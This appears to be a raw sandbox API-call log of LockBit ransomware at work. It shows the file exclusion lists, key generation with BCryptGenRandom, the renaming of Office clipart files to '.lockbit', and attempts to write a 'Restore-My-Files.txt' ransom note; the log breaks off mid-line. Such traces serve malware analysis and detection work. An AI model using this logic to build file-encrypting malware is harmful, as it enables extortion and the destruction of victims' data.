1 [0139.350] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.350] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.350] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.351] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.351] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.351] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.351] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.372] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.372] malloc (_Size=0xa6) returned 0x77d7a8 [0139.372] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0139.374] free (_Block=0x77d7a8) [0139.374] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107130.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.374] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.374] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.374] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbcfc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107132.WMF", cAlternateFileName="")) returned 1 [0139.374] lstrcmpiW (lpString1=".", lpString2="J0107132.WMF") returned -1 [0139.374] lstrcmpiW (lpString1="..", lpString2="J0107132.WMF") returned -1 [0139.374] PathFindExtensionW (pszPath="J0107132.WMF") returned=".WMF" [0139.374] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.374] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.374] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.374] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.374] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.374] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.374] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.374] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.374] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.375] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.375] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.376] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.376] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.376] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.376] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.376] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.376] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.376] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.376] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.376] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.376] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.376] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.376] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.376] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107132.WMF") returned 1 [0139.376] lstrcmpiW (lpString1="ntldr", lpString2="J0107132.WMF") returned 1 [0139.376] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107132.WMF") returned 1 [0139.376] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107132.WMF") returned -1 [0139.376] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107132.WMF") returned -1 [0139.376] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107132.WMF") returned 1 [0139.376] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107132.WMF") returned -1 [0139.376] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.376] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF") returned=".WMF" [0139.376] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.376] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.377] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.377] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.377] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF.lockbit") returned 72 [0139.378] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107132.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.378] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.379] malloc (_Size=0x40068) returned 0x3df0008 [0139.379] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=48380) returned 1 [0139.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.379] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.379] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.379] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.380] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.380] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.380] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.386] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.386] malloc (_Size=0xa6) returned 0x77d7a8 [0139.386] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.388] free (_Block=0x77d7a8) [0139.388] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107132.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.388] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.388] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.388] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5636ddf0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbd04, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107134.WMF", cAlternateFileName="")) returned 1 [0139.388] lstrcmpiW (lpString1=".", lpString2="J0107134.WMF") returned -1 [0139.388] lstrcmpiW (lpString1="..", lpString2="J0107134.WMF") returned -1 [0139.388] PathFindExtensionW (pszPath="J0107134.WMF") returned=".WMF" [0139.389] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.389] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.390] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.390] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0107134.WMF") returned 1 [0139.390] lstrcmpiW (lpString1="ntldr", lpString2="J0107134.WMF") returned 1 [0139.390] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0107134.WMF") returned 1 [0139.390] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0107134.WMF") returned -1 [0139.390] lstrcmpiW (lpString1="autorun.inf", lpString2="J0107134.WMF") returned -1 [0139.391] lstrcmpiW (lpString1="thumbs.db", lpString2="J0107134.WMF") returned 1 [0139.391] lstrcmpiW (lpString1="iconcache.db", lpString2="J0107134.WMF") returned -1 [0139.391] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0139.391] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF") returned=".WMF" [0139.391] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0139.391] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0139.391] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0139.392] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0139.392] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0139.392] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0139.392] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0139.392] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0139.392] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0139.392] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF.lockbit") returned 72 [0139.392] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0107134.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0139.393] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0139.393] malloc (_Size=0x40068) returned 0x3df0008 [0139.393] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=48388) returned 1 [0139.393] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.394] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0139.394] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0139.394] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0139.394] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0139.394] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0139.399] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0139.399] malloc (_Size=0xa6) returned 0x77d7a8 [0139.399] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0139.401] free (_Block=0x77d7a8) [0139.402] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0107134.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0139.402] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0139.402] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0139.402] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7502c600, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e8eef0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7502c600, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4330, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0107138.WMF", cAlternateFileName="")) returned 1 [0139.402] lstrcmpiW (lpString1=".", lpString2="J0107138.WMF") returned -1 [0139.402] lstrcmpiW (lpString1="..", lpString2="J0107138.WMF") returned -1 [0139.402] PathFindExtensionW (pszPath="J0107138.WMF") returned=".WMF" [0139.402] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0139.402] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0139.402] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0139.402] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0139.402] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0139.402] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0139.402] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0139.402] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0139.402] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0139.402] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0139.402] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0139.402] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0139.402] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0139.402] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0139.402] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0139.402] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0139.403] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0139.403] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0139.404] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0139.404] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0139.404] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0139.404] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0139.404] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0139.404] 